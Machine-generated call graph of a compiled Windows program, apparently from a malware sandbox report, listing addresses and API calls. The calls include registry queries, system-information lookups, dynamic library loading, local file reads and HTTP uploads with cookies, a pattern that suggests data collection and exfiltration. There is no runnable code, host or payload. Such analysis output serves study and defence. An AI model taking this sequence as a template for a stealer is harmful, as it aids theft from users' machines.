11140 1642ee memcpy memset 11139->11140 11141 16434d memcpy memset 11139->11141 11142 16431b 11140->11142 11144 16432b std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 11140->11144 11141->11047 11143 164347 _invalid_parameter_noinfo_noreturn 11142->11143 11142->11144 11143->11141 11144->11047 11147 16320e 11146->11147 11148 16323b 11146->11148 11149 175703 std::_Facet_Register 4 API calls 11147->11149 11150 16324c 11148->11150 11152 175703 std::_Facet_Register 4 API calls 11148->11152 11151 16321f 11149->11151 11150->11139 11153 163235 _invalid_parameter_noinfo_noreturn 11151->11153 11154 163228 11151->11154 11155 163245 11152->11155 11153->11148 11154->11139 11155->11139 11158 17f6de 11157->11158 11158->11158 11159 17f7f9 GetModuleHandleW 11158->11159 11160 17f810 LoadLibraryW 11159->11160 11161 17f96f GetProcAddress 11159->11161 11160->11161 11164 17fd26 11160->11164 11165 17fca6 GetProcAddress 11161->11165 11169 17fb1c 11161->11169 11166 1755f4 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11164->11166 11165->11164 11167 17fcbd GetCurrentProcess 11165->11167 11168 17fd38 11166->11168 11170 17fccd 11167->11170 11168->10754 11169->11165 11170->11164 11171 17fcd1 GetNativeSystemInfo 11170->11171 11172 17fcf3 11171->11172 11173 17fd0e 11171->11173 11172->11173 11174 17fcf9 11172->11174 11175 1755f4 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11173->11175 11176 1755f4 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11174->11176 11177 17fd1f 11175->11177 11178 17fd07 11176->11178 11177->10754 11178->10754 11180 1825de 11179->11180 11181 1825a7 11179->11181 11182 18262c 11180->11182 11183 1825f2 GetVersionExW 11180->11183 11181->11180 11184 1825ba RegFlushKey 11181->11184 11185 1825c1 RegCloseKey 11181->11185 11186 1755f4 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11182->11186 11183->11182 11184->11185 11187 163540 9 API calls 11185->11187 11188 17ebfc 11186->11188 11187->11180 11189 183380 11188->11189 11190 183391 11189->11190 11191 17ec13 11189->11191 11192 1833a2 11190->11192 11193 183397 RegCloseKey 11190->11193 11197 182cc0 11191->11197 11192->11191 11194 1833ba RegCloseKey 11192->11194 11195 1833b1 RegFlushKey 11192->11195 11193->11192 11196 163540 9 API calls 11194->11196 11195->11194 11196->11191 11198 182d10 11197->11198 11198->11198 11199 163540 9 API calls 11198->11199 11200 182d29 11199->11200 11201 16c3d0 6 API calls 11200->11201 11202 182d3e 11201->11202 11298 1828a0 11202->11298 11205 182d55 memmove 11206 182d87 RegOpenKeyExW 11205->11206 11208 182dcc 11206->11208 11230 182ea6 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 11206->11230 11211 16c3d0 6 API calls 11208->11211 11208->11230 11209 182f1d RegOpenKeyExW 11209->11230 11213 182def 11211->11213 11212 1831af std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 11215 1755f4 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11212->11215 11308 1824f0 11213->11308 11214 18305e RegOpenKeyExW 11214->11230 11218 17ed9b 11215->11218 11217 182eff _invalid_parameter_noinfo_noreturn 11217->11230 11218->10763 11234 183280 RegQueryValueExW 11218->11234 11222 1824f0 9 API calls 11222->11230 11224 16c3d0 6 API calls 11224->11230 11226 182490 12 API calls 11226->11230 11227 182e52 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 11229 182ea0 _invalid_parameter_noinfo_noreturn 11227->11229 11227->11230 11228 182e4c _invalid_parameter_noinfo_noreturn 11228->11227 11229->11230 11230->11209 11230->11212 11230->11214 11230->11217 11230->11222 11230->11224 11230->11226 11231 176890 _invalid_parameter_noinfo_noreturn 11230->11231 11232 182fc9 _invalid_parameter_noinfo_noreturn 11230->11232 11233 18301d _invalid_parameter_noinfo_noreturn 11230->11233 11319 182740 11230->11319 11231->11230 11232->11230 11233->11230 11235 183300 11234->11235 11236 17ef29 11234->11236 11235->11236 11237 183307 malloc memset 11235->11237 11236->10768 11288 163190 11236->11288 11342 1827f0 RegQueryValueExW 11237->11342 11239 18335c free 11239->11236 11241 163540 9 API calls 11241->11239 11243 1768f5 11242->11243 11246 176907 11242->11246 11244 1755f4 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11243->11244 11245 176903 11244->11245 11245->10790 11247 17696d 11246->11247 11248 176a3a 11246->11248 11247->11243 11250 176971 11247->11250 11248->11243 11249 176a42 11248->11249 11253 176a5a 11249->11253 11257 163540 9 API calls 11249->11257 11251 176a6d 11250->11251 11252 17698d 11250->11252 11255 164210 13 API calls 11251->11255 11259 163540 9 API calls 11252->11259 11254 1755f4 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11253->11254 11258 176a69 11254->11258 11256 176a72 11255->11256 11257->11253 11258->10790 11260 1769b6 11259->11260 11261 1769c0 11260->11261 11262 1769eb 11260->11262 11263 163190 _invalid_parameter_noinfo_noreturn 11261->11263 11262->11253 11264 1769f3 11262->11264 11265 1769c7 11263->11265 11266 176a1d std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 11264->11266 11268 176a17 _invalid_parameter_noinfo_noreturn 11264->11268 11267 1755f4 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11265->11267 11270 1755f4 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11266->11270 11269 1769e7 11267->11269 11268->11266 11269->10790 11271 176a36 11270->11271 11271->10790 11273 176d15 11272->11273 11273->11273 11274 16a8a0 10 API calls 11273->11274 11275 176d39 11274->11275 11276 1632d0 12 API calls 11275->11276 11277 176d4e 11276->11277 11278 1632d0 12 API calls 11277->11278 11279 176d6b 11278->11279 11279->10801 11279->10803 11281 18269b 11280->11281 11284 1826c8 11280->11284 11282 1826aa RegCloseKey 11281->11282 11283 1826a1 RegFlushKey 11281->11283 11285 163540 9 API calls 11282->11285 11283->11282 11286 163190 _invalid_parameter_noinfo_noreturn 11284->11286 11285->11284 11287 17f653 11286->11287 11287->10807 11289 16319b 11288->11289 11290 1631bc std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 11288->11290 11289->11290 11291 1631dd _invalid_parameter_noinfo_noreturn 11289->11291 11290->10768 11293 1827b9 11292->11293 11294 1827e4 11292->11294 11295 1827c8 RegCloseKey 11293->11295 11296 1827bf RegFlushKey 11293->11296 11294->10763 11297 163540 9 API calls 11295->11297 11296->11295 11297->11294 11299 1828d8 11298->11299 11301 182907 11298->11301 11300 163540 9 API calls 11299->11300 11300->11301 11304 182960 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 11301->11304 11307 18295a _invalid_parameter_noinfo_noreturn 11301->11307 11302 18299c std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 11303 1755f4 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11302->11303 11306 1829bf 11303->11306 11304->11302 11305 182996 _invalid_parameter_noinfo_noreturn 11304->11305 11305->11302 11306->11205 11306->11206 11307->11304 11327 183410 11308->11327 11310 182501 11311 182490 11310->11311 11312 18249e 11311->11312 11313 1632d0 12 API calls 11312->11313 11314 1824ac 11313->11314 11315 176890 11314->11315 11316 1768a3 11315->11316 11317 17689e 11315->11317 11316->11227 11316->11228 11318 163190 _invalid_parameter_noinfo_noreturn 11317->11318 11318->11316 11320 18274d 11319->11320 11324 18277a 11319->11324 11321 18275c RegCloseKey 11320->11321 11322 182753 RegFlushKey 11320->11322 11323 163540 9 API calls 11321->11323 11322->11321 11323->11324 11325 163540 9 API calls 11324->11325 11326 1827a8 11325->11326 11326->11230 11328 18344b 11327->11328 11329 183427 11327->11329 11330 18352d 11328->11330 11331 18345d 11328->11331 11329->11310 11341 1631f0 ?_Xlength_error@std@@YAXPBD 11330->11341 11334 163260 5 API calls 11331->11334 11335 18348f 11334->11335 11336 183508 memcpy 11335->11336 11337 1834ad memcpy 11335->11337 11336->11310 11338 1834d8 11337->11338 11339 1834e8 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 11337->11339 11338->11339 11340 183502 _invalid_parameter_noinfo_noreturn 11338->11340 11339->11310 11340->11336 11343 18281e 11342->11343 11343->11239 11343->11241 11346 16c70b std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 11344->11346 11345 16c910 _invalid_parameter_noinfo_noreturn 11346->11345 11347 16c8e2 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 11346->11347 11347->10827 11349 17355a 11348->11349 11438 175480 11349->11438 11351 1735e7 11352 16c3d0 6 API calls 11351->11352 11353 1735f9 11352->11353 11449 183c60 11353->11449 11356 173631 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 11357 17366d std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 11356->11357 11361 173667 _invalid_parameter_noinfo_noreturn 11356->11361 11358 1736bd std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 11357->11358 11363 1736b7 _invalid_parameter_noinfo_noreturn 11357->11363 11360 1755f4 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11358->11360 11359 17362b _invalid_parameter_noinfo_noreturn 11359->11356 11362 1736df ??0Value@Json@@QAE@W4ValueType@1@ ??0Reader@Json@@QAE ?parse@Reader@Json@@QAE_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAVValue@2@_N 11360->11362 11361->11357 11362->10836 11362->10844 11363->11358 11365 163466 memmove 11364->11365 11370 16348e 11364->11370 11365->10888 11366 163537 11781 1631f0 ?_Xlength_error@std@@YAXPBD 11366->11781 11370->11366 11371 163200 5 API calls 11370->11371 11372 1634d7 memcpy 11371->11372 11373 1634fb 11372->11373 11374 163518 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 11372->11374 11373->11374 11375 163531 _invalid_parameter_noinfo_noreturn 11373->11375 11374->10888 11375->11366 11377 163450 9 API calls 11376->11377 11378 173c3c 11377->11378 11782 168ab0 11378->11782 11380 173eca std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 11382 173f00 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 11380->11382 11387 173efa _invalid_parameter_noinfo_noreturn 11380->11387 11381 173c73 strchr 11401 173c4b std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 11381->11401 11383 173f48 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 11382->11383 11388 173f42 _invalid_parameter_noinfo_noreturn 11382->11388 11385 1755f4 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11383->11385 11384 173ec4 _invalid_parameter_noinfo_noreturn 11384->11380 11391 173f6c 11385->11391 11386 173f70 11799 1631f0 ?_Xlength_error@std@@YAXPBD 11386->11799 11387->11382 11388->11383 11389 173e47 11396 1622d0 6 API calls 11389->11396 11400 173e62 11389->11400 11390 173e3a Sleep 11390->11381 11391->10919 11391->10920 11394 163200 5 API calls 11394->11401 11396->11400 11398 173da7 memcpy 11398->11401 11399 173d44 memcpy 11399->11401 11400->11380 11400->11384 11401->11381 11401->11384 11401->11386 11401->11389 11401->11390 11401->11394 11401->11398 11401->11399 11401->11400 11800 1622d0 11401->11800 11407 181247 11406->11407 11407->11407 11806 1817e0 memset 11407->11806 11410 1814c1 11412 176cc0 16 API calls 11410->11412 11411 1813f7 memset GetModuleFileNameW 11415 181430 11411->11415 11413 1814d7 11412->11413 11414 1632d0 12 API calls 11413->11414 11416 1814f4 11414->11416 11415->11415 11418 163540 9 API calls 11415->11418 11417 163190 _invalid_parameter_noinfo_noreturn 11416->11417 11419 181529 11417->11419 11420 1814a2 11418->11420 11421 1814bc std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 11419->11421 11424 18157d _invalid_parameter_noinfo_noreturn 11419->11424 11422 1632d0 12 API calls 11420->11422 11423 16c3d0 6 API calls 11421->11423 11422->11421 11425 1815a3 11423->11425 11424->11421 11426 16c3d0 6 API calls 11425->11426 11427 1815b8 11426->11427 11824 180f20 memset 11427->11824 11430 1815fc std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 11431 181638 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 11430->11431 11434 181632 _invalid_parameter_noinfo_noreturn 11430->11434 11436 181682 _invalid_parameter_noinfo_noreturn 11431->11436 11437 181688 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 11431->11437 11432 1815f6 _invalid_parameter_noinfo_noreturn 11432->11430 11433 1755f4 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11435 174e34 11433->11435 11434->11431 11435->10839 11436->11437 11437->11433 11439 163540 9 API calls 11438->11439 11440 1754d9 ___scrt_initialize_default_local_stdio_options 11439->11440 11441 1754f7 __stdio_common_vswprintf 11440->11441 11446 1755bb std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 11440->11446 11464 16c4f0 11441->11464 11444 175572 11447 163540 9 API calls 11444->11447 11445 17558f 11445->11446 11448 1755b5 _invalid_parameter_noinfo_noreturn 11445->11448 11446->11351 11447->11445 11448->11446 11450 16c3d0 6 API calls 11449->11450 11451 183cc2 11450->11451 11452 16c3d0 6 API calls 11451->11452 11453 183cda 11452->11453 11473 184650 WideCharToMultiByte 11453->11473 11455 183ce0 11481 183d80 11455->11481 11458 183d1d std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 11459 183d59 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 11458->11459 11462 183d53 _invalid_parameter_noinfo_noreturn 11458->11462 11460 1755f4 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11459->11460 11463 173602 11460->11463 11461 183d17 _invalid_parameter_noinfo_noreturn 11461->11458 11462->11459 11463->11356 11463->11359 11465 16c512 11464->11465 11471 16c520 __stdio_common_vsnwprintf_s 11464->11471 11466 16c54f 11465->11466 11467 16c51a 11465->11467 11472 164d00 ?_Xlength_error@std@@YAXPBD 11466->11472 11468 163260 5 API calls 11467->11468 11468->11471 11471->11444 11471->11445 11510 1755e6 11473->11510 11475 1846b6 memset WideCharToMultiByte 11476 1846f8 11475->11476 11476->11476 11477 163450 9 API calls 11476->11477 11478 18470a std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 11477->11478 11479 184747 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 11478->11479 11480 184741 _invalid_parameter_noinfo_noreturn 11478->11480 11479->11455 11480->11479 11511 183540 11481->11511 11486 184015 11547 183690 11486->11547 11489 183e01 11534 186500 11489->11534 11490 184020 11491 18404c std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 11490->11491 11495 184046 _invalid_parameter_noinfo_noreturn 11490->11495 11493 1755f4 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11491->11493 11496 183ce8 11493->11496 11495->11491 11496->11458 11496->11461 11497 184001 11556 185d50 11497->11556 11498 183e2d memset 11542 186ef0 11498->11542 11501 183eb1 memmove 11509 183e72 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 11501->11509 11502 184078 11563 1631f0 ?_Xlength_error@std@@YAXPBD 11502->11563 11504 186ef0 3 API calls 11504->11509 11506 163200 5 API calls 11506->11509 11507 183f50 memcpy memcpy 11507->11509 11508 183fb1 memcpy memcpy 11508->11509 11509->11495 11509->11497 11509->11501 11509->11502 11509->11504 11509->11506 11509->11507 11509->11508 11564 1843c0 11511->11564 11514 1843c0 4 API calls 11515 18360a 11514->11515 11516 185d80 11515->11516 11567 175ee0 11516->11567 11520 185e4b strncmp 11521 185e70 strncmp 11520->11521 11523 185e6b 11520->11523 11522 185e8c strncmp 11521->11522 11521->11523 11522->11523 11524 163450 9 API calls 11523->11524 11525 185ed3 11524->11525 11525->11525 11592 185f50 InternetOpenA 11525->11592 11527 1755f4 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11528 183dee 11527->11528 11528->11486 11530 186400 11528->11530 11531 1864c9 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 11530->11531 11532 18640d std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 11530->11532 11531->11489 11532->11531 11533 1864f8 _invalid_parameter_noinfo_noreturn 11532->11533 11535 186544 11534->11535 11536 186595 InternetCloseHandle 11535->11536 11619 186600 11535->11619 11540 183e25 11536->11540 11537 18656c 11537->11536 11538 186575 11537->11538 11538->11538 11539 163450 9 API calls 11538->11539 11539->11540 11540->11497 11540->11498 11543 186faa _CxxThrowException 11542->11543 11544 186f35 InternetReadFile 11542->11544 11546 186fbf _CxxThrowException 11543->11546 11545 186f4a 11544->11545 11544->11546 11545->11509 11548 186400 _invalid_parameter_noinfo_noreturn 11547->11548 11549 1836c0 11548->11549 11550 1862e0 _invalid_parameter_noinfo_noreturn 11549->11550 11551 1836c7 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 11550->11551 11552 1837fa _invalid_parameter_noinfo_noreturn 11551->11552 11553 1837cc std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 11551->11553 11554 183690 2 API calls 11552->11554 11553->11490 11555 18381b std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 11554->11555 11555->11490 11557 185d61 InternetCloseHandle 11556->11557 11558 185d64 11556->11558 11557->11558 11559 185d6b InternetCloseHandle 11558->11559 11560 185d6e 11558->11560 11559->11560 11561 185d78 11560->11561 11562 185d75 InternetCloseHandle 11560->11562 11561->11486 11562->11561 11565 175703 std::_Facet_Register 4 API calls 11564->11565 11566 1835e3 11565->11566 11566->11514 11568 175ef4 memset memset memset memset memset 11567->11568 11569 186fe0 11568->11569 11572 187040 11569->11572 11570 18708b strncmp 11573 1870ab 11570->11573 11571 187062 strncmp 11571->11570 11571->11572 11572->11570 11572->11571 11575 18719e 11573->11575 11580 187175 strncmp 11573->11580 11587 1871fe 11573->11587 11574 18726b 11576 187275 strncmp 11574->11576 11581 187298 strncpy_s 11574->11581 11577 1871a6 strncpy_s strncpy_s 11575->11577 11575->11587 11576->11574 11578 1872c7 memset strncpy_s atoi strncpy_s 11576->11578 11577->11587 11579 1873bf 11578->11579 11583 187424 11579->11583 11586 1873d7 11579->11586 11580->11573 11580->11575 11581->11579 11582 187242 strncmp 11582->11574 11582->11587 11585 1755f4 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11583->11585 11588 18743c 11585->11588 11586->11586 11589 1873f7 strncpy_s 11586->11589 11587->11574 11587->11582 11588->11520 11590 1755f4 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11589->11590 11591 187420 11590->11591 11591->11520 11593 186147 _CxxThrowException 11592->11593 11596 185fa9 11592->11596 11594 186009 InternetConnectA 11595 185fdb 11594->11595 11597 186132 _CxxThrowException 11595->11597 11598 186032 InternetAttemptConnect 11595->11598 11596->11593 11596->11594 11596->11595 11597->11593 11599 18611d _CxxThrowException 11598->11599 11600 186042 11598->11600 11599->11597 11611 185a60 11600->11611 11603 186096 11605 1860a3 11603->11605 11606 185a60 9 API calls 11603->11606 11604 185a60 9 API calls 11604->11603 11615 1862e0 11605->11615 11606->11605 11608 1860aa 11609 186400 _invalid_parameter_noinfo_noreturn 11608->11609 11610 185f34 11609->11610 11610->11527 11612 185a70 11611->11612 11613 163450 9 API calls 11612->11613 11614 185a82 11613->11614 11614->11603 11614->11604 11616 1863ae std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 11615->11616 11617 1862f0 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 11615->11617 11616->11608 11617->11616 11618 1863eb _invalid_parameter_noinfo_noreturn 11617->11618 11620 18663e 11619->11620 11621 1867f2 _CxxThrowException 11619->11621 11620->11621 11623 186647 HttpOpenRequestA 11620->11623 11622 186807 _CxxThrowException 11621->11622 11624 18681c _CxxThrowException 11622->11624 11625 18667e 11623->11625 11626 186846 _CxxThrowException 11623->11626 11627 186831 _CxxThrowException 11624->11627 11625->11626 11630 186687 HttpAddRequestHeadersA 11625->11630 11628 186bf8 11626->11628 11629 1868ab 11626->11629 11627->11626 11633 186c19 _CxxThrowException 11628->11633 11629->11628 11631 1868b4 HttpOpenRequestA 11629->11631 11630->11622 11642 1866a2 11630->11642 11632 1868eb 11631->11632 11703 186b30 11631->11703 11635 1868f4 HttpAddRequestHeadersA 11632->11635 11632->11703 11636 186c5e 11633->11636 11637 186e76 _CxxThrowException 11633->11637 11634 1867bd HttpSendRequestA 11634->11624 11638 1867d2 11634->11638 11639 18690f HttpAddRequestHeadersA 11635->11639 11635->11703 11636->11637 11640 186c67 HttpOpenRequestA 11636->11640 11643 186e8b _CxxThrowException 11637->11643 11644 1755f4 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11638->11644 11659 186941 11639->11659 11639->11703 11646 186c9e 11640->11646 11647 186ed6 _CxxThrowException 11640->11647 11641 1866ed 11723 177160 11641->11723 11642->11634 11642->11641 11645 163450 9 API calls 11642->11645 11648 186ea0 HeapFree _CxxThrowException 11643->11648 11649 1867ec 11644->11649 11645->11641 11646->11647 11652 186ca7 HttpAddRequestHeadersA 11646->11652 11654 186ec1 _CxxThrowException 11648->11654 11649->11537 11652->11643 11656 186cc2 11652->11656 11654->11647 11655 186a83 11752 185a90 11655->11752 11657 186ddd 11656->11657 11662 186d0d 11656->11662 11671 163450 9 API calls 11656->11671 11663 186de4 GetProcessHeap HeapAlloc 11657->11663 11659->11655 11666 186998 11659->11666 11669 163450 9 API calls 11659->11669 11661 186a96 memset 11767 185a20 11661->11767 11675 177160 12 API calls 11662->11675 11670 186e00 11663->11670 11664 18675b 11668 177160 12 API calls 11664->11668 11674 177160 12 API calls 11666->11674 11685 186764 11668->11685 11669->11666 11773 1861c0 11670->11773 11671->11662 11672 18673c 11730 1661b0 11672->11730 11673 186abd HttpAddRequestHeadersA 11684 186af7 HttpSendRequestExA 11673->11684 11673->11703 11678 1869af 11674->11678 11679 186d21 11675->11679 11676 1867ae 11745 162440 11676->11745 11690 186a0c 11678->11690 11691 1859f0 __stdio_common_vsprintf_s 11678->11691 11692 186d7b 11679->11692 11693 1859f0 __stdio_common_vsprintf_s 11679->11693 11686 186b4e InternetWriteFile 11684->11686 11687 186b23 11684->11687 11685->11676 11688 18678c InternetSetCookieA 11685->11688 11700 186b8b HttpEndRequestW 11686->11700 11701 186b74 11686->11701 11770 186160 GetProcessHeap HeapFree 11687->11770 11688->11627 11688->11685 11695 177160 12 API calls 11690->11695 11702 1869ea 11691->11702 11696 177160 12 API calls 11692->11696 11694 186d5c 11693->11694 11715 1661b0 12 API calls 11694->11715 11719 186a18 11695->11719 11720 186d84 11696->11720 11698 186e4a GetProcessHeap HeapFree 11704 1755f4 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11698->11704 11699 186e3d GetLastError 11699->11648 11699->11698 11706 186bbd GetProcessHeap HeapFree 11700->11706 11707 186b9f 11700->11707 11771 186160 GetProcessHeap HeapFree 11701->11771 11714 1661b0 12 API calls 11702->11714 11703->11628 11712 186e70 11704->11712 11709 1755f4 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11706->11709 11772 186160 GetProcessHeap HeapFree 11707->11772 11716 186be6 11709->11716 11710 186a71 11717 162440 2 API calls 11710->11717 11711 186dce 11718 162440 2 API calls 11711->11718 11712->11537 11713 186ba6 11713->11633 11714->11690 11715->11692 11716->11537 11717->11655 11718->11657 11719->11710 11721 186a46 InternetSetCookieA 11719->11721 11720->11711 11722 186dac InternetSetCookieA 11720->11722 11721->11703 11721->11719 11722->11654 11722->11720 11724 177170 11723->11724 11724->11724 11725 1661b0 12 API calls 11724->11725 11726 177182 11725->11726 11726->11664 11727 1859f0 11726->11727 11778 1755e0 11727->11778 11729 185a06 __stdio_common_vsprintf_s 11729->11672 11731 1661d2 memmove 11730->11731 11732 1661ff 11730->11732 11731->11664 11733 166301 11732->11733 11734 16620e 11732->11734 11779 1631f0 ?_Xlength_error@std@@YAXPBD 11733->11779 11738 163200 5 API calls 11734->11738 11739 166255 11738->11739 11740 1662d4 memcpy memcpy 11739->11740 11741 166275 memcpy memcpy 11739->11741 11740->11664 11742 1662a2 11741->11742 11744 1662b2 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 11741->11744 11743 1662ce _invalid_parameter_noinfo_noreturn 11742->11743 11742->11744 11743->11740 11744->11664 11746 16244b 11745->11746 11747 162466 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 11745->11747 11746->11747 11748 162485 _invalid_parameter_noinfo_noreturn 11746->11748 11747->11634 11749 163190 11748->11749 11750 1631bc std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 11749->11750 11751 1631dd _invalid_parameter_noinfo_noreturn 11749->11751 11750->11634 11753 185b14 11752->11753 11757 185aad 11752->11757 11754 185b2f GetProcessHeap HeapAlloc 11753->11754 11755 185b24 11753->11755 11756 185ce5 memcpy 11754->11756 11760 185b4d 11754->11760 11755->11661 11761 185d20 11756->11761 11757->11753 11758 185aca CreateFileA GetFileSize CloseHandle 11757->11758 11758->11757 11760->11756 11762 1874e0 __stdio_common_vsprintf_s 11760->11762 11763 185bcf CreateFileA 11760->11763 11764 185bfb GetFileSize ReadFile 11760->11764 11765 185c5e CloseHandle 11760->11765 11766 185c3d ReadFile 11760->11766 11761->11661 11762->11760 11763->11760 11764->11760 11764->11765 11765->11760 11766->11760 11780 1755e0 11767->11780 11769 185a39 __stdio_common_vsprintf_s 11769->11673 11770->11703 11771->11703 11772->11713 11777 1861dc 11773->11777 11774 1862bb HttpSendRequestA 11774->11698 11774->11699 11775 187440 8 API calls 11775->11777 11776 186254 _errno _invalid_parameter_noinfo 11776->11777 11777->11774 11777->11775 11777->11776 11778->11729 11780->11769 11783 168b07 11782->11783 11784 168abf std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 11782->11784 11783->11401 11784->11783 11785 168b0b _invalid_parameter_noinfo_noreturn 11784->11785 11786 168b20 11785->11786 11787 168d2a 11786->11787 11790 168b8d 11786->11790 11805 164d00 ?_Xlength_error@std@@YAXPBD 11787->11805 11791 175703 std::_Facet_Register 4 API calls 11790->11791 11795 168bf6 11790->11795 11791->11795 11792 175703 std::_Facet_Register 4 API calls 11792->11795 11793 168c08 _invalid_parameter_noinfo_noreturn 11793->11795 11794 1622d0 6 API calls 11794->11795 11795->11792 11795->11793 11795->11794 11796 1690d0 7 API calls 11795->11796 11797 168ccb std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 11795->11797 11798 168ab0 7 API calls 11795->11798 11796->11795 11797->11401 11798->11795 11801 1622f5 11800->11801 11802 1622fc 11801->11802 11803 163200 5 API calls 11801->11803 11802->11401 11804 16232e memcpy 11803->11804 11804->11401 11834 1755e0 11806->11834 11808 18183c __stdio_common_vsprintf_s 11809 181870 11808->11809 11809->11809 11810 163450 9 API calls 11809->11810 11811 18188c 11810->11811 11835 176b00 11811->11835 11813 181a3b 11816 181a9f OutputDebugStringA 11813->11816 11817 181a95 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 11813->11817 11820 181a8f _invalid_parameter_noinfo_noreturn 11813->11820 11815 162440 2 API calls 11815->11813 11818 181ac5 11816->11818 11821 181aec std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 11816->11821 11817->11816 11818->11821 11823 181ae6 _invalid_parameter_noinfo_noreturn 11818->11823 11819 1755f4 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11822 1813c7 11819->11822 11820->11817 11821->11819 11822->11410 11822->11411 11823->11821 11825 180f90 11824->11825 11825->11825 11826 180fb6 GetPEB 11825->11826 11827 180ff1 11826->11827 11829 181134 _invalid_parameter_noinfo_noreturn 11827->11829 11832 18113a std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 11827->11832 11828 18118a std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 11830 1755f4 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11828->11830 11829->11832 11831 1811ae 11830->11831 11831->11430 11831->11432 11832->11828 11833 181184 _invalid_parameter_noinfo_noreturn 11832->11833 11833->11828 11834->11808 11836 176b57 11835->11836 11837 176b90 11836->11837 11838 176c59 11836->11838 11852 176c1d std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 11836->11852 11839 176ba4 11837->11839 11840 176cad 11837->11840 11838->11852 11855 166160 memcpy 11838->11855 11846 163200 5 API calls 11839->11846 11859 1631f0 ?_Xlength_error@std@@YAXPBD 11840->11859 11841 1661b0 12 API calls 11843 176c84 11841->11843 11847 1661b0 12 API calls 11843->11847 11848 176be0 11846->11848 11849 176c99 11847->11849 11850 176c3f memcpy 11848->11850 11851 176bf8 memcpy 11848->11851 11849->11813 11849->11815 11850->11852 11851->11852 11853 176c0d 11851->11853 11852->11841 11853->11852 11854 176c39 _invalid_parameter_noinfo_noreturn 11853->11854 11854->11850 11856 166191 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 11855->11856 11857 166181 11855->11857 11856->11852 11857->11856 11858 1661a7 _invalid_parameter_noinfo_noreturn 11857->11858 11860->10928 11862 17e4b5 11863 17e4b8 11862->11863 11864 182540 17 API calls 11863->11864 11865 17e4c8 11864->11865 11866 183380 12 API calls 11865->11866 11867 17e4dc 11866->11867 11868 182cc0 38 API calls 11867->11868 11872 17e65b 11868->11872 11869 17e9d0 11870 182670 12 API calls 11869->11870 11877 17e9db 11870->11877 11871 183280 14 API calls 11873 17e7e2 11871->11873 11872->11869 11872->11871 11872->11872 11874 1827b0 11 API calls 11873->11874 11875 17e9c5 11874->11875 11876 163190 _invalid_parameter_noinfo_noreturn 11875->11876 